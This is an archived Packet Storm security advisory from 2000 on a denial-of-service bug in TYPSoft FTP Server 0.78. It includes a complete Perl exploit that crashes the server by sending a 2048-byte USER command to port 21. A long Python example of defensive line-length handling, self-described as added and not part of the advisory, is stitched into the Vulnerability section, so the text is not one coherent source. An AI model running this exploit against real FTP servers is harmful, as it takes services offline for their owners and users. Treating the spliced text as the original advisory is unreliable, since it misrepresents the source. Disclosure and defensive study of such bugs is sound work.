typsoft-ftpd.txt

2000-09-12T00:00:00
ID PACKETSTORM:23051
Type packetstorm
Reporter Dethy
Modified 2000-09-12T00:00:00

Description

*******************************************  
+ TYPSoft FTP Server remote DoS Problem +  
*******************************************  
# Advisory by dethy #  
# www.synnergy.net #  
|=========================================|  
  
Advisory # 12  
  
Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ]  
Systems : Win9X, WinNT  
Product : http://www.multimania.com/typsoft/  
Discovery : dethy@synnergy.net  
  
" Another trivial bug. "  
  
Description  
-----------  
  
TYPSoft FTP is a freeware FTP server with the features that both
beginners and advanced users need.
  
  
Vulnerability  
-------------  
  
TYPSoft FTP Server does not correctly handle commands longer than
2048 bytes [ 2k ]. Sending a long 'user', 'pass', 'cwd', etc. command
causes the server to hang and consume increasing system resources.
The process will not be active again until it is manually restarted.
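The missing length check, shown as an added defensive example: a control-connection reader that never buffers more than a fixed number of bytes per command and answers an oversized line with a 500 reply instead of stalling. This is not TYPSoft's code or the advisory's script; the 2048-byte cap, the reply texts, the three-strike 421 and the run_session helper are this example's own assumptions.

```python
import io
# Largest control-connection line accepted (verb + argument). 2048 is the figure
# the advisory cites; using it as the hard cap is this example's own choice.
MAX_LINE = 2048

class LineTooLong(Exception):
    """A line hit MAX_LINE with no CRLF; args[0] is the number of bytes dropped."""

def read_command(stream, max_len=MAX_LINE):
    """Read one FTP command, never holding more than max_len bytes of it.
    Returns (VERB, argument), or None at EOF; raises LineTooLong when over cap."""
    # readline(limit) stops at '\n' or after limit bytes; +2 leaves room for CRLF.
    line = stream.readline(max_len + 2)
    if not line:
        return None
    if not line.endswith(b"\n") and len(line) == max_len + 2:
        # Over the cap: drain the rest of the line in bounded pieces instead of
        # growing a buffer for as long as the client keeps sending.
        dropped = len(line)
        while True:
            tail = stream.readline(max_len)
            dropped += len(tail)
            if not tail or tail.endswith(b"\n"):
                break
        raise LineTooLong(dropped)
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg.decode("latin-1")

def handle_session(stream, max_bad=3):
    """Minimal reply loop; returns the replies a server would send. Oversized
    lines get a 500 and are counted; after max_bad the session is closed (421)."""
    replies, bad = [], 0
    while True:
        try:
            cmd = read_command(stream)
        except LineTooLong as exc:
            bad += 1
            replies.append(f"500 Line too long, {exc.args[0]} bytes discarded")
            if bad >= max_bad:
                replies.append("421 Too many errors, closing control connection")
                return replies
            continue
        if cmd is None:
            return replies
        verb, arg = cmd
        replies.append(f"331 Password required for {arg}" if verb == "USER"
                       else "502 Command not implemented")

def run_session(data):
    return handle_session(io.BytesIO(data))  # feed a constructed byte string
```

Feeding it the advisory's own 2048-byte USER argument yields a 500 and the next command is still served, which is the behaviour the vulnerable build lacks.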
  
  
Exploit  
-------  
  
A simple script that sends a long 'user' command to the server, resulting
in the ftpd crashing.
  
================<cut>==================
#!/usr/bin/perl
# Sends one 2048-byte USER argument to the target's FTP control port.
use strict;
use warnings;
use Getopt::Std;
use IO::Socket;

my %args;
getopts('s:', \%args);
usage() unless defined $args{s};

my $EOL  = "\015\012";    # CRLF, the FTP line terminator
my $data = "A" x 2048;    # 2k argument, the length the server mishandles

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $args{s},
    PeerPort => "ftp(21)",
) or die "Unable to connect to ftp port at $args{s}\n";
$remote->autoflush(1);

print $remote "USER $data" . $EOL;
while (<$remote>) { print }    # echo replies until the server stops talking
print "\nCrash was successful !\n";

sub usage { die "\n$0 -s <server>\n\n" }
================</cut>====================
  
Solution  
--------  
  
The vendor [ typsoft@altern.org ] has been contacted; wait until a patched version
comes out or use an alternative product.
  
  
Disclaimer  
----------  
  
Synnergy Networks may not be held liable for the use and/or potential effects of these  
programs or advisories, nor the content contained within. Use them at your own risk.  
  
---------------------------------------------------------------------------------------  
Web : http://www.synnergy.net  
E-Mail : dethy@synnergy.net  
  